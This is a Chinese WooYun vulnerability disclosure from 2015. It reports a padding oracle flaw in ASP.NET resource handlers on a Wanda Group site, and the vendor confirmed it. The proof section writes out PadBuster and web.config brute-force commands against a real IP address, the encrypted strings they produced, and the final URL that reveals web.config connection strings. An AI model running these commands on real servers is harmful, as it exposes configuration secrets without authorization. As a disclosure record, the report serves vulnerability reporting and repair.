漏洞概要
关注数(24)
关注此漏洞
漏洞标题:万达集团旗下某站配置问题可读敏感信息
漏洞作者: 水晶
提交时间:2015-08-24 14:20
修复时间:2015-10-08 14:54
公开时间:2015-10-08 14:54
漏洞类型:应用配置错误
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2015-08-24: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经确认,细节仅向厂商公开
2015-09-03: 细节向核心白帽子及相关领域专家公开
2015-09-13: 细节向普通白帽子公开
2015-09-23: 细节向实习白帽子公开
2015-10-08: 细节向公众公开
简要描述:
万达集团旗下某站配置问题可读敏感信息
详细说明:
检测到http://59.108.36.117:8000/WebResource.axd?d=1440148493可能存在oracle padding漏洞
漏洞证明:
1.脚本探测
perl Padbuster.pl http://59.108.36.117:8000/WebResource.axd?d=9MBwmxN6TLKjC8S3CdFGyw2 9MBwmxN6TLKjC8S3CdFGyw2 16 -encoding 3 -plaintext "|||~/web.config"
拿到了web.config的URL的加密地址:mQPKilqbL9QtyFXrYnku4AAAAAAAAAAAAAAAAAAAAAA1
2.利用脚本继续填充
perl Web.config_bruter.pl http://59.108.36.117:8000/ScriptResource.axd mQPKilqbL9QtyFXrYnku4AAAAAAAAAAAAAAAAAAAAAA1 16
得到了加密字符串:CX8PD2QimGkjB3nMBDaKRJkDyopamy_ULchV62J5LuAAAAAAAAAAAAAAAAAAAAAA0
3.这样就得到了Web.Config完整的访问地址
http://59.108.36.117:8000/ScriptResource.axd?d=CX8PD2QimGkjB3nMBDaKRJkDyopamy_ULchV62J5LuAAAAAAAAAAAAAAAAAAAAAA0
看到了连接字符串,虽然连的是本机,但是安全无大小,要注意这些细节啊。
修复方案:
版权声明:转载请注明来源 水晶@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2015-08-24 14:53
厂商回复:
感谢水晶同学的关注与贡献,马上通知业务整改!
最新状态:
暂无
漏洞评价:
评论